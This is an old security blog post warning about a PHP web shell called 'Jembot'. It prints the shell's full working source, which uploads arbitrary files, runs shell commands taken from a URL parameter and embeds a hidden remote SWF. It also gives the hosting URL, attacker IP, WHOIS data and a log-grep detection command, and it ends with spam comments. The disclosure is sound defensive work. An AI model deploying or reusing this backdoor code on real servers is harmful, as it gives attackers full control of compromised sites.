вторник, 17 апреля 2012 г.

Find new web bot [Jembot]

We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:

<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
.php

Attacks coming from IP 187.17.65.242 Brasil

WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022 
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106 
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830 
We strongly recommend to block this ip address and run the following command to detect attacks:
#egrep -n --color "hell.php" *.log

7 комментариев:


  1. Thanks for your post!


    شركة شحن عفش من جدة الى الامارات شركة شحن عفش من جدة الى الامارات
    شركة شحن عفش من جدة الى الاردن شركة شحن عفش من جدة الى الاردن

    ОтветитьУдалить
  2. Among other courses, business research writing services has become popular since students seek Business Coursework Writing Services and business essay writing services.

    ОтветитьУдалить